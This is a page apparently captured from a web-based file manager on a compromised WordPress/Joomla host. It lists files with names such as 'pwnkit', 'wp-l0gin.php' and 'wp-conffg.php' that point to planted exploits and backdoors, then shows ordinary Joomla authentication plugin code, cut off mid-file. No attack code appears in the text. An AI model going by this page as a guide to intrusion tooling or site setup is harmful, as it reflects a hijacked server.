pwnkit.tar
4.5
KB
-rw-r--r--
pwnkit.tar.gz
117
B
-rw-r--r--
qing.php
26
B
-rw-r--r--
qing.php.php.tar.gz
155
B
-rw-r--r--
qing.php.tar
2
KB
-rw-r--r--
query.php.php.tar.gz
5.07
KB
-rw-r--r--
query.php.tar
38.5
KB
-rw-r--r--
readme.html.html.tar.gz
0
B
-rw-r--r--
readme.html.tar
9
KB
-rw-r--r--
registration-functions.php.php...
274
B
-rw-r--r--
registration-functions.php.tar
2
KB
-rw-r--r--
registration.php.php.tar.gz
0
B
-rw-r--r--
registration.php.tar
2
KB
-rw-r--r--
resize-2x.gif.gif.tar.gz
307
B
-rw-r--r--
resize-2x.gif.tar
2
KB
-rw-r--r--
rest-api.php.php.tar.gz
21.68
KB
-rw-r--r--
rest-api.php.tar
102.5
KB
-rw-r--r--
revision.php.php.tar.gz
4.66
KB
-rw-r--r--
revision.php.tar
24.5
KB
-rw-r--r--
revisions-rtl.css.css.tar.gz
2.71
KB
-rw-r--r--
revisions-rtl.css.tar
12.5
KB
-rw-r--r--
revisions.css.css.tar.gz
2.68
KB
-rw-r--r--
revisions.css.tar
12
KB
-rw-r--r--
rewrite.php.php.tar.gz
5.9
KB
-rw-r--r--
rewrite.php.tar
21
KB
-rw-r--r--
robots.txt
73
B
-rw-r--r--
robots.txt.tar
2
KB
-rw-r--r--
robots.txt.txt.tar.gz
179
B
-rw-r--r--
routes.php.php.tar.gz
1.36
KB
-rw-r--r--
routes.php.tar
6.5
KB
-rw-r--r--
royalkarukera.zip
15.86
MB
-rw-r--r--
sampledata.tar
106.5
KB
-rw-r--r--
sampledata.tar.gz
17.7
KB
-rw-r--r--
schema.php.php.tar.gz
0
B
-rw-r--r--
schema.php.tar
46.5
KB
-rw-r--r--
script-loader-packages.php.php...
2.54
KB
-rw-r--r--
script-loader-packages.php.tar
18.5
KB
-rw-r--r--
script-loader.php.php.tar.gz
31.06
KB
-rw-r--r--
script-loader.php.tar
292.5
KB
-rw-r--r--
script-modules.php.php.tar.gz
2.94
KB
-rw-r--r--
script-modules.php.tar
22.5
KB
-rw-r--r--
scss.tar
234
KB
-rw-r--r--
scss.tar.gz
29.16
KB
-rw-r--r--
search.zip
35.54
KB
-rw-r--r--
setup-config.php.php.tar.gz
5.76
KB
-rw-r--r--
setup-config.php.tar
19.5
KB
-rw-r--r--
shortcodes.php.php.tar.gz
6.58
KB
-rw-r--r--
shortcodes.php.tar
25
KB
-rw-r--r--
sid4.php
78.48
KB
-rw-r--r--
sid4.php.php.tar.gz
24.7
KB
-rw-r--r--
sid4.php.tar
80
KB
-rw-r--r--
site-editor.php.php.tar.gz
3.61
KB
-rw-r--r--
site-editor.php.tar
14
KB
-rw-r--r--
site-health-info.php.php.tar.g...
1.68
KB
-rw-r--r--
site-health-info.php.tar
6
KB
-rw-r--r--
site-health.php.php.tar.gz
3.57
KB
-rw-r--r--
site-health.php.tar
12
KB
-rw-r--r--
site-icon.css.css.tar.gz
1.33
KB
-rw-r--r--
site-icon.css.tar
6
KB
-rw-r--r--
site-users.php.php.tar.gz
3.46
KB
-rw-r--r--
site-users.php.tar
13.5
KB
-rw-r--r--
sitemaps.zip
50.02
KB
-rw-r--r--
speculative-loading.php.php.ta...
3.58
KB
-rw-r--r--
speculative-loading.php.tar
13.5
KB
-rw-r--r--
ssl.zip
345.37
KB
-rw-r--r--
stars-2x.png.png.tar.gz
1.43
KB
-rw-r--r--
stars-2x.png.tar
3
KB
-rw-r--r--
storage.tar
4.5
KB
-rw-r--r--
storage.tar.gz
705
B
-rw-r--r--
streams.php.php.tar.gz
1.89
KB
-rw-r--r--
streams.php.tar
9.5
KB
-rw-r--r--
style-engine.php.php.tar.gz
2.16
KB
-rw-r--r--
style-engine.php.tar
9.5
KB
-rw-r--r--
sunrise.tar
99
KB
-rw-r--r--
sunrise.tar.gz
11.06
KB
-rw-r--r--
template.php.php.tar.gz
8.19
KB
-rw-r--r--
template.php.tar
37.5
KB
-rw-r--r--
templates.zip
4.51
MB
-rw-r--r--
term.php.php.tar.gz
1.06
KB
-rw-r--r--
term.php.tar
7
KB
-rw-r--r--
theme-previews.php.php.tar.gz
0
B
-rw-r--r--
theme-previews.php.tar
4.5
KB
-rw-r--r--
tmp.tar
108.5
KB
-rw-r--r--
tmp.tar.gz
0
B
-rw-r--r--
tmp.zip
159.02
KB
-rw-r--r--
tmpl.zip
1.32
KB
-rw-r--r--
update.php.php.tar.gz
0
B
-rw-r--r--
update.php.tar
52.5
KB
-rw-r--r--
upgrade-temp-backup.tar
1.5
KB
-rw-r--r--
upgrade-temp-backup.tar.gz
86
B
-rw-r--r--
upgrade.zip
1.59
KB
-rw-r--r--
uploads.tar
29.03
MB
-rw-r--r--
uploads.tar.gz
26.71
MB
-rw-r--r--
uploadsx.tar
7
KB
-rw-r--r--
uploadsx.tar.gz
784
B
-rw-r--r--
user-new.php.php.tar.gz
6.35
KB
-rw-r--r--
user-new.php.tar
76
KB
-rw-r--r--
user.php.php.tar.gz
6.76
KB
-rw-r--r--
user.php.tar
25
KB
-rw-r--r--
users.php.php.tar.gz
5.93
KB
-rw-r--r--
users.php.tar
51
KB
-rw-r--r--
vars.php.php.tar.gz
2.09
KB
-rw-r--r--
vars.php.tar
8
KB
-rw-r--r--
w-logo-blue.png.png.tar.gz
2.56
KB
-rw-r--r--
w-logo-blue.png.tar
5
KB
-rw-r--r--
w-logo-gray.png.png.tar.gz
4.58
KB
-rw-r--r--
w-logo-gray.png.tar
6
KB
-rw-r--r--
web.config.config.tar.gz
207
B
-rw-r--r--
web.config.tar
2
KB
-rw-r--r--
web.config.txt.config.txt.tar....
960
B
-rw-r--r--
web.config.txt.tar
4.5
KB
-rw-r--r--
web.config.txt__9a2a123.config...
729
B
-rw-r--r--
web.config.txt__9a2a123.tar
3.5
KB
-rw-r--r--
webservices.zip
46.92
KB
-rw-r--r--
widgets.php.php.tar.gz
679
B
-rw-r--r--
widgets.php.tar
73
KB
-rw-r--r--
widgets.tar
173.5
KB
-rw-r--r--
widgets.tar.gz
31.49
KB
-rw-r--r--
worksec.php.php.tar.gz
669
B
-rw-r--r--
worksec.php.tar
15
KB
-rw-r--r--
wp-activate.php
7.54
KB
-rw----r--
wp-activate.php.php.tar.gz
2.68
KB
-rw-r--r--
wp-activate.php.tar
9.5
KB
-rw-r--r--
wp-admin.tar
9.6
MB
-rw-r--r--
wp-admin.tar.gz
2.21
MB
-rw-r--r--
wp-admin.zip
9.23
MB
-rw-r--r--
wp-blog-header.php
351
B
-rw----r--
wp-blog-header.php.php.tar.gz
339
B
-rw-r--r--
wp-blog-header.php.tar
2
KB
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw----r--
wp-comments-post.php.php.tar.g...
1.15
KB
-rw-r--r--
wp-comments-post.php.tar
4
KB
-rw-r--r--
wp-conffg.php
132.17
KB
-rw-r--r--
wp-conffg.php.php.tar.gz
41.62
KB
-rw-r--r--
wp-conffg.php.tar
134
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw----r--
wp-config-sample.php.php.tar.g...
1.4
KB
-rw-r--r--
wp-config-sample.php.tar
17
KB
-rw-r--r--
wp-config.php
3.53
KB
-rw-rw-rw-
wp-config.php.php.tar.gz
1.89
KB
-rw-r--r--
wp-config.php.tar
5.5
KB
-rw-r--r--
wp-content-css.php
258.9
KB
-rw-r--r--
wp-content-css.php.php.tar.gz
65.77
KB
-rw-r--r--
wp-content-css.php.tar
260.5
KB
-rw-r--r--
wp-content.zip
509.09
MB
-rw-r--r--
wp-cron.php
5.49
KB
-rw----r--
wp-cron.php.php.tar.gz
2.16
KB
-rw-r--r--
wp-cron.php.tar
13
KB
-rw-r--r--
wp-editor.php
53.57
KB
-rw-r--r--
wp-editor.php.php.tar.gz
38.47
KB
-rw-r--r--
wp-editor.php.tar
55.5
KB
-rw-r--r--
wp-hader-css.php
9.53
KB
-rw-r--r--
wp-hader-css.php.php.tar.gz
2.5
KB
-rw-r--r--
wp-hader-css.php.tar
11.5
KB
-rw-r--r--
wp-includes.tar.gz
18.98
MB
-rw-r--r--
wp-includes.zip
81.97
MB
-rw-r--r--
wp-l0gin.php
170.48
KB
-rw-r--r--
wp-l0gin.php.php.tar.gz
37.71
KB
-rw-r--r--
wp-l0gin.php.tar
172
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw----r--
wp-links-opml.php.php.tar.gz
1.21
KB
-rw-r--r--
wp-links-opml.php.tar
13
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw----r--
wp-load.php.php.tar.gz
1.72
KB
-rw-r--r--
wp-load.php.tar
10
KB
-rw-r--r--
wp-login.php
53.13
KB
-rw----r--
wp-mail.php
8.52
KB
-rw----r--
wp-mail.php.php.tar.gz
3.11
KB
-rw-r--r--
wp-mail.php.tar
20
KB
-rw-r--r--
wp-settings.php
32.38
KB
-rw----r--
wp-settings.php.php.tar.gz
6.55
KB
-rw-r--r--
wp-settings.php.tar
65
KB
-rw-r--r--
wp-sever.html
6.33
KB
-rw-r--r--
wp-sever.html.html.tar.gz
2.52
KB
-rw-r--r--
wp-sever.html.tar
8
KB
-rw-r--r--
wp-signup.php
34.26
KB
-rw----r--
wp-signup.php.php.tar.gz
8.03
KB
-rw-r--r--
wp-signup.php.tar
105.5
KB
-rw-r--r--
wp-storage.html
6.51
KB
-rw-r--r--
wp-storage.html.html.tar.gz
2.53
KB
-rw-r--r--
wp-storage.html.tar
8.5
KB
-rw-r--r--
wp-theme-css.php
302.97
KB
-rw-r--r--
wp-theme-css.php.php.tar.gz
69.85
KB
-rw-r--r--
wp-theme-css.php.tar
304.5
KB
-rw-r--r--
wp-theme.php
216.5
KB
-rw-r--r--
wp-theme.php.php.tar.gz
58.45
KB
-rw-r--r--
wp-theme.php.tar
218
KB
-rw-r--r--
wp-trackback.php
5.27
KB
-rw----r--
wp-trackback.php.php.tar.gz
2.02
KB
-rw-r--r--
wp-trackback.php.tar
24.5
KB
-rw-r--r--
www.zenitproduction.fr.zip
36.5
KB
-rw-r--r--
xit-2x.gif.gif.tar.gz
828
B
-rw-r--r--
xit-2x.gif.tar
2.5
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw----r--
xmlrpc.php.php.tar.gz
1.5
KB
-rw-r--r--
xmlrpc.php.tar
5
KB
-rw-r--r--
ycc.php.php.tar.gz
2.91
KB
-rw-r--r--
ycc.php.tar
5.5
KB
-rw-r--r--
yes.png.png.tar.gz
712
B
-rw-r--r--
yes.png.tar
2.5
KB
-rw-r--r--
zenit.tar
123
KB
-rw-r--r--
zenit.tar.gz
0
B
-rw-r--r--
zenitproduction.fr.zip
14.35
KB
-rw-r--r--
{app.zip
3.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : authentication.tar
joomla/joomla.php 0000644 00000014003 15251745263 0010027 0 ustar 00 <?php /** * @package Joomla.Plugin * @subpackage Authentication.joomla * * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; /** * Joomla Authentication plugin * * @since 1.5 */ class PlgAuthenticationJoomla extends JPlugin { /** * This method should handle any authentication and report back to the subject * * @param array $credentials Array holding the user credentials * @param array $options Array of extra options * @param object &$response Authentication response object * * @return void * * @since 1.5 */ public function onUserAuthenticate($credentials, $options, &$response) { $response->type = 'Joomla'; // Joomla does not like blank passwords if (empty($credentials['password'])) { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_EMPTY_PASS_NOT_ALLOWED'); return; } // Get a database object $db = JFactory::getDbo(); $query = $db->getQuery(true) ->select('id, password') ->from('#__users') ->where('username=' . $db->quote($credentials['username'])); $db->setQuery($query); $result = $db->loadObject(); if ($result) { $match = JUserHelper::verifyPassword($credentials['password'], $result->password, $result->id); if ($match === true) { // Bring this in line with the rest of the system $user = JUser::getInstance($result->id); $response->email = $user->email; $response->fullname = $user->name; if (JFactory::getApplication()->isClient('administrator')) { $response->language = $user->getParam('admin_language'); } else { $response->language = $user->getParam('language'); } $response->status = JAuthentication::STATUS_SUCCESS; $response->error_message = ''; } else { // Invalid password $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_INVALID_PASS'); } } else { // Let's hash the entered password even if we don't have a matching user for some extra response time // By doing so, we mitigate side channel user enumeration attacks JUserHelper::hashPassword($credentials['password']); // Invalid user $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_NO_USER'); } // Check the two factor authentication if ($response->status === JAuthentication::STATUS_SUCCESS) { $methods = JAuthenticationHelper::getTwoFactorMethods(); if (count($methods) <= 1) { // No two factor authentication method is enabled return; } JModelLegacy::addIncludePath(JPATH_ADMINISTRATOR . '/components/com_users/models', 'UsersModel'); /** @var UsersModelUser $model */ $model = JModelLegacy::getInstance('User', 'UsersModel', array('ignore_request' => true)); // Load the user's OTP (one time password, a.k.a. two factor auth) configuration if (!array_key_exists('otp_config', $options)) { $otpConfig = $model->getOtpConfig($result->id); $options['otp_config'] = $otpConfig; } else { $otpConfig = $options['otp_config']; } // Check if the user has enabled two factor authentication if (empty($otpConfig->method) || ($otpConfig->method === 'none')) { // Warn the user if they are using a secret code but they have not // enabled two factor auth in their account. if (!empty($credentials['secretkey'])) { try { $app = JFactory::getApplication(); $this->loadLanguage(); $app->enqueueMessage(JText::_('PLG_AUTH_JOOMLA_ERR_SECRET_CODE_WITHOUT_TFA'), 'warning'); } catch (Exception $exc) { // This happens when we are in CLI mode. In this case // no warning is issued return; } } return; } // Try to validate the OTP FOFPlatform::getInstance()->importPlugin('twofactorauth'); $otpAuthReplies = FOFPlatform::getInstance()->runPlugins('onUserTwofactorAuthenticate', array($credentials, $options)); $check = false; /* * This looks like noob code but DO NOT TOUCH IT and do not convert * to in_array(). During testing in_array() inexplicably returned * null when the OTEP begins with a zero! o_O */ if (!empty($otpAuthReplies)) { foreach ($otpAuthReplies as $authReply) { $check = $check || $authReply; } } // Fall back to one time emergency passwords if (!$check) { // Did the user use an OTEP instead? if (empty($otpConfig->otep)) { if (empty($otpConfig->method) || ($otpConfig->method === 'none')) { // Two factor authentication is not enabled on this account. // Any string is assumed to be a valid OTEP. return; } else { /* * Two factor authentication enabled and no OTEPs defined. The * user has used them all up. Therefore anything they enter is * an invalid OTEP. */ $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_INVALID_SECRETKEY'); return; } } // Clean up the OTEP (remove dashes, spaces and other funny stuff // our beloved users may have unwittingly stuffed in it) $otep = $credentials['secretkey']; $otep = filter_var($otep, FILTER_SANITIZE_NUMBER_INT); $otep = str_replace('-', '', $otep); $check = false; // Did we find a valid OTEP? if (in_array($otep, $otpConfig->otep)) { // Remove the OTEP from the array $otpConfig->otep = array_diff($otpConfig->otep, array($otep)); $model->setOtpConfig($result->id, $otpConfig); // Return true; the OTEP was a valid one $check = true; } } if (!$check) { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_INVALID_SECRETKEY'); } } } } joomla/joomla.xml 0000644 00000001505 15251745263 0010043 0 ustar 00 <?xml version="1.0" encoding="utf-8"?> <extension version="3.1" type="plugin" group="authentication" method="upgrade"> <name>plg_authentication_joomla</name> <author>Joomla! Project</author> <creationDate>November 2005</creationDate> <copyright>Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.</copyright> <license>GNU General Public License version 2 or later; see LICENSE.txt</license> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>3.0.0</version> <description>PLG_AUTH_JOOMLA_XML_DESCRIPTION</description> <files> <filename plugin="joomla">joomla.php</filename> </files> <languages> <language tag="en-GB">en-GB.plg_authentication_joomla.ini</language> <language tag="en-GB">en-GB.plg_authentication_joomla.sys.ini</language> </languages> </extension> ldap/.mad-root 0000644 00000000000 15251745263 0007207 0 ustar 00 ldap/ldap.xml 0000604 00000007574 15251745263 0007151 0 ustar 00 <?xml version="1.0" encoding="utf-8"?> <extension version="3.1" type="plugin" group="authentication" method="upgrade"> <name>plg_authentication_ldap</name> <author>Joomla! Project</author> <creationDate>November 2005</creationDate> <copyright>Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.</copyright> <license>GNU General Public License version 2 or later; see LICENSE.txt</license> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>3.0.0</version> <description>PLG_LDAP_XML_DESCRIPTION</description> <files> <filename plugin="ldap">ldap.php</filename> </files> <languages> <language tag="en-GB">en-GB.plg_authentication_ldap.ini</language> <language tag="en-GB">en-GB.plg_authentication_ldap.sys.ini</language> </languages> <config> <fields name="params"> <fieldset name="basic"> <field name="host" type="text" label="PLG_LDAP_FIELD_HOST_LABEL" description="PLG_LDAP_FIELD_HOST_DESC" size="20" /> <field name="port" type="number" label="PLG_LDAP_FIELD_PORT_LABEL" description="PLG_LDAP_FIELD_PORT_DESC" min="1" max="65535" default="389" hint="389" validate="number" filter="integer" size="5" /> <field name="use_ldapV3" type="radio" label="PLG_LDAP_FIELD_V3_LABEL" description="PLG_LDAP_FIELD_V3_DESC" default="0" filter="integer" class="btn-group btn-group-yesno" > <option value="1">JYES</option> <option value="0">JNO</option> </field> <field name="negotiate_tls" type="radio" label="PLG_LDAP_FIELD_NEGOCIATE_LABEL" description="PLG_LDAP_FIELD_NEGOCIATE_DESC" default="0" filter="integer" class="btn-group btn-group-yesno" > <option value="1">JYES</option> <option value="0">JNO</option> </field> <field name="no_referrals" type="radio" label="PLG_LDAP_FIELD_REFERRALS_LABEL" description="PLG_LDAP_FIELD_REFERRALS_DESC" default="0" filter="integer" class="btn-group btn-group-yesno" > <option value="1">JYES</option> <option value="0">JNO</option> </field> <field name="auth_method" type="list" label="PLG_LDAP_FIELD_AUTHMETHOD_LABEL" description="PLG_LDAP_FIELD_AUTHMETHOD_DESC" default="bind" > <option value="search">PLG_LDAP_FIELD_VALUE_BINDSEARCH</option> <option value="bind">PLG_LDAP_FIELD_VALUE_BINDUSER</option> </field> <field name="base_dn" type="text" label="PLG_LDAP_FIELD_BASEDN_LABEL" description="PLG_LDAP_FIELD_BASEDN_DESC" size="20" /> <field name="search_string" type="text" label="PLG_LDAP_FIELD_SEARCHSTRING_LABEL" description="PLG_LDAP_FIELD_SEARCHSTRING_DESC" size="20" /> <field name="users_dn" type="text" label="PLG_LDAP_FIELD_USERSDN_LABEL" description="PLG_LDAP_FIELD_USERSDN_DESC" size="20" /> <field name="username" type="text" label="PLG_LDAP_FIELD_USERNAME_LABEL" description="PLG_LDAP_FIELD_USERNAME_DESC" size="20" /> <field name="password" type="password" label="PLG_LDAP_FIELD_PASSWORD_LABEL" description="PLG_LDAP_FIELD_PASSWORD_DESC" size="20" /> <field name="ldap_fullname" type="text" label="PLG_LDAP_FIELD_FULLNAME_LABEL" description="PLG_LDAP_FIELD_FULLNAME_DESC" default="fullName" size="20" /> <field name="ldap_email" type="text" label="PLG_LDAP_FIELD_EMAIL_LABEL" description="PLG_LDAP_FIELD_EMAIL_DESC" default="mail" size="20" /> <field name="ldap_uid" type="text" label="PLG_LDAP_FIELD_UID_LABEL" description="PLG_LDAP_FIELD_UID_DESC" default="uid" size="20" /> </fieldset> </fields> </config> </extension> ldap/ldap.php 0000644 00000011775 15251745263 0007142 0 ustar 00 <?php /** * @package Joomla.Plugin * @subpackage Authentication.ldap * * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; use Joomla\Ldap\LdapClient; /** * LDAP Authentication Plugin * * @since 1.5 */ class PlgAuthenticationLdap extends JPlugin { /** * This method should handle any authentication and report back to the subject * * @param array $credentials Array holding the user credentials * @param array $options Array of extra options * @param object &$response Authentication response object * * @return boolean * * @since 1.5 */ public function onUserAuthenticate($credentials, $options, &$response) { $userdetails = null; $success = 0; $userdetails = array(); // For JLog $response->type = 'LDAP'; // Strip null bytes from the password $credentials['password'] = str_replace(chr(0), '', $credentials['password']); // LDAP does not like Blank passwords (tries to Anon Bind which is bad) if (empty($credentials['password'])) { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_EMPTY_PASS_NOT_ALLOWED'); return false; } // Load plugin params info $ldap_email = $this->params->get('ldap_email'); $ldap_fullname = $this->params->get('ldap_fullname'); $ldap_uid = $this->params->get('ldap_uid'); $auth_method = $this->params->get('auth_method'); $ldap = new LdapClient($this->params); if (!$ldap->connect()) { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_NOT_CONNECT'); return; } switch ($auth_method) { case 'search': { // Bind using Connect Username/password // Force anon bind to mitigate misconfiguration like [#7119] if ($this->params->get('username', '') !== '') { $bindtest = $ldap->bind(); } else { $bindtest = $ldap->anonymous_bind(); } if ($bindtest) { // Search for users DN $binddata = $this->searchByString( str_replace( '[search]', str_replace(';', '\3b', $ldap->escape($credentials['username'], null, LDAP_ESCAPE_FILTER)), $this->params->get('search_string') ), $ldap ); if (isset($binddata[0], $binddata[0]['dn'])) { // Verify Users Credentials $success = $ldap->bind($binddata[0]['dn'], $credentials['password'], 1); // Get users details $userdetails = $binddata; } else { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_NO_USER'); } } else { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_NOT_CONNECT'); } } break; case 'bind': { // We just accept the result here $success = $ldap->bind($ldap->escape($credentials['username'], null, LDAP_ESCAPE_DN), $credentials['password']); if ($success) { $userdetails = $this->searchByString( str_replace( '[search]', str_replace(';', '\3b', $ldap->escape($credentials['username'], null, LDAP_ESCAPE_FILTER)), $this->params->get('search_string') ), $ldap ); } else { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_INVALID_PASS'); } } break; } if (!$success) { $response->status = JAuthentication::STATUS_FAILURE; if ($response->error_message === '') { $response->error_message = JText::_('JGLOBAL_AUTH_INVALID_PASS'); } } else { // Grab some details from LDAP and return them if (isset($userdetails[0][$ldap_uid][0])) { $response->username = $userdetails[0][$ldap_uid][0]; } if (isset($userdetails[0][$ldap_email][0])) { $response->email = $userdetails[0][$ldap_email][0]; } if (isset($userdetails[0][$ldap_fullname][0])) { $response->fullname = $userdetails[0][$ldap_fullname][0]; } else { $response->fullname = $credentials['username']; } // Were good - So say so. $response->status = JAuthentication::STATUS_SUCCESS; $response->error_message = ''; } $ldap->close(); } /** * Shortcut method to build a LDAP search based on a semicolon separated string * * Note that this method requires that semicolons which should be part of the search term to be escaped * to correctly split the search string into separate lookups * * @param string $search search string of search values * @param LdapClient $ldap The LDAP client * * @return array Search results * * @since 3.8.2 */ private function searchByString($search, LdapClient $ldap) { $results = explode(';', $search); foreach ($results as $key => $result) { $results[$key] = '(' . str_replace('\3b', ';', $result) . ')'; } return $ldap->search($results); } } ldap/pwnkit 0000755 00000000000 15251745263 0006726 0 ustar 00 cookie/cookie.php 0000644 00000026761 15251745263 0010025 0 ustar 00 <?php /** * @package Joomla.Plugin * @subpackage Authentication.cookie * * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; /** * Joomla Authentication plugin * * @since 3.2 * @note Code based on http://jaspan.com/improved_persistent_login_cookie_best_practice * and http://fishbowl.pastiche.org/2004/01/19/persistent_login_cookie_best_practice/ */ class PlgAuthenticationCookie extends JPlugin { /** * Application object * * @var JApplicationCms * @since 3.2 */ protected $app; /** * Database object * * @var JDatabaseDriver * @since 3.2 */ protected $db; /** * Reports the privacy related capabilities for this plugin to site administrators. * * @return array * * @since 3.9.0 */ public function onPrivacyCollectAdminCapabilities() { $this->loadLanguage(); return array( JText::_('PLG_AUTHENTICATION_COOKIE') => array( JText::_('PLG_AUTH_COOKIE_PRIVACY_CAPABILITY_COOKIE'), ) ); } /** * This method should handle any authentication and report back to the subject * * @param array $credentials Array holding the user credentials * @param array $options Array of extra options * @param object &$response Authentication response object * * @return boolean * * @since 3.2 */ public function onUserAuthenticate($credentials, $options, &$response) { // No remember me for admin if ($this->app->isClient('administrator')) { return false; } // Get cookie $cookieName = 'joomla_remember_me_' . JUserHelper::getShortHashedUserAgent(); $cookieValue = $this->app->input->cookie->get($cookieName); // Try with old cookieName (pre 3.6.0) if not found if (!$cookieValue) { $cookieName = JUserHelper::getShortHashedUserAgent(); $cookieValue = $this->app->input->cookie->get($cookieName); } if (!$cookieValue) { return false; } $cookieArray = explode('.', $cookieValue); // Check for valid cookie value if (count($cookieArray) !== 2) { // Destroy the cookie in the browser. $this->app->input->cookie->set($cookieName, '', 1, $this->app->get('cookie_path', '/'), $this->app->get('cookie_domain', '')); JLog::add('Invalid cookie detected.', JLog::WARNING, 'error'); return false; } $response->type = 'Cookie'; // Filter series since we're going to use it in the query $filter = new JFilterInput; $series = $filter->clean($cookieArray[1], 'ALNUM'); // Remove expired tokens $query = $this->db->getQuery(true) ->delete('#__user_keys') ->where($this->db->quoteName('time') . ' < ' . $this->db->quote(time())); try { $this->db->setQuery($query)->execute(); } catch (RuntimeException $e) { // We aren't concerned with errors from this query, carry on } // Find the matching record if it exists. $query = $this->db->getQuery(true) ->select($this->db->quoteName(array('user_id', 'token', 'series', 'time'))) ->from($this->db->quoteName('#__user_keys')) ->where($this->db->quoteName('series') . ' = ' . $this->db->quote($series)) ->where($this->db->quoteName('uastring') . ' = ' . $this->db->quote($cookieName)) ->order($this->db->quoteName('time') . ' DESC'); try { $results = $this->db->setQuery($query)->loadObjectList(); } catch (RuntimeException $e) { $response->status = JAuthentication::STATUS_FAILURE; return false; } if (count($results) !== 1) { // Destroy the cookie in the browser. $this->app->input->cookie->set($cookieName, '', 1, $this->app->get('cookie_path', '/'), $this->app->get('cookie_domain', '')); $response->status = JAuthentication::STATUS_FAILURE; return false; } // We have a user with one cookie with a valid series and a corresponding record in the database. if (!JUserHelper::verifyPassword($cookieArray[0], $results[0]->token)) { /* * This is a real attack! * Either the series was guessed correctly or a cookie was stolen and used twice (once by attacker and once by victim). * Delete all tokens for this user! */ $query = $this->db->getQuery(true) ->delete('#__user_keys') ->where($this->db->quoteName('user_id') . ' = ' . $this->db->quote($results[0]->user_id)); try { $this->db->setQuery($query)->execute(); } catch (RuntimeException $e) { // Log an alert for the site admin JLog::add( sprintf('Failed to delete cookie token for user %s with the following error: %s', $results[0]->user_id, $e->getMessage()), JLog::WARNING, 'security' ); } // Destroy the cookie in the browser. $this->app->input->cookie->set($cookieName, '', 1, $this->app->get('cookie_path', '/'), $this->app->get('cookie_domain', '')); // Issue warning by email to user and/or admin? JLog::add(JText::sprintf('PLG_AUTH_COOKIE_ERROR_LOG_LOGIN_FAILED', $results[0]->user_id), JLog::WARNING, 'security'); $response->status = JAuthentication::STATUS_FAILURE; return false; } // Make sure there really is a user with this name and get the data for the session. $query = $this->db->getQuery(true) ->select($this->db->quoteName(array('id', 'username', 'password'))) ->from($this->db->quoteName('#__users')) ->where($this->db->quoteName('username') . ' = ' . $this->db->quote($results[0]->user_id)) ->where($this->db->quoteName('requireReset') . ' = 0'); try { $result = $this->db->setQuery($query)->loadObject(); } catch (RuntimeException $e) { $response->status = JAuthentication::STATUS_FAILURE; return false; } if ($result) { // Bring this in line with the rest of the system $user = JUser::getInstance($result->id); // Set response data. $response->username = $result->username; $response->email = $user->email; $response->fullname = $user->name; $response->password = $result->password; $response->language = $user->getParam('language'); // Set response status. $response->status = JAuthentication::STATUS_SUCCESS; $response->error_message = ''; } else { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_NO_USER'); } } /** * We set the authentication cookie only after login is successfullly finished. * We set a new cookie either for a user with no cookies or one * where the user used a cookie to authenticate. * * @param array $options Array holding options * * @return boolean True on success * * @since 3.2 */ public function onUserAfterLogin($options) { // No remember me for admin if ($this->app->isClient('administrator')) { return false; } if (isset($options['responseType']) && $options['responseType'] === 'Cookie') { // Logged in using a cookie $cookieName = 'joomla_remember_me_' . JUserHelper::getShortHashedUserAgent(); // We need the old data to get the existing series $cookieValue = $this->app->input->cookie->get($cookieName); // Try with old cookieName (pre 3.6.0) if not found if (!$cookieValue) { $oldCookieName = JUserHelper::getShortHashedUserAgent(); $cookieValue = $this->app->input->cookie->get($oldCookieName); // Destroy the old cookie in the browser $this->app->input->cookie->set($oldCookieName, '', 1, $this->app->get('cookie_path', '/'), $this->app->get('cookie_domain', '')); } $cookieArray = explode('.', $cookieValue); // Filter series since we're going to use it in the query $filter = new JFilterInput; $series = $filter->clean($cookieArray[1], 'ALNUM'); } elseif (!empty($options['remember'])) { // Remember checkbox is set $cookieName = 'joomla_remember_me_' . JUserHelper::getShortHashedUserAgent(); // Create a unique series which will be used over the lifespan of the cookie $unique = false; $errorCount = 0; do { $series = JUserHelper::genRandomPassword(20); $query = $this->db->getQuery(true) ->select($this->db->quoteName('series')) ->from($this->db->quoteName('#__user_keys')) ->where($this->db->quoteName('series') . ' = ' . $this->db->quote($series)); try { $results = $this->db->setQuery($query)->loadResult(); if ($results === null) { $unique = true; } } catch (RuntimeException $e) { $errorCount++; // We'll let this query fail up to 5 times before giving up, there's probably a bigger issue at this point if ($errorCount === 5) { return false; } } } while ($unique === false); } else { return false; } // Get the parameter values $lifetime = $this->params->get('cookie_lifetime', 60) * 24 * 60 * 60; $length = $this->params->get('key_length', 16); // Generate new cookie $token = JUserHelper::genRandomPassword($length); $cookieValue = $token . '.' . $series; // 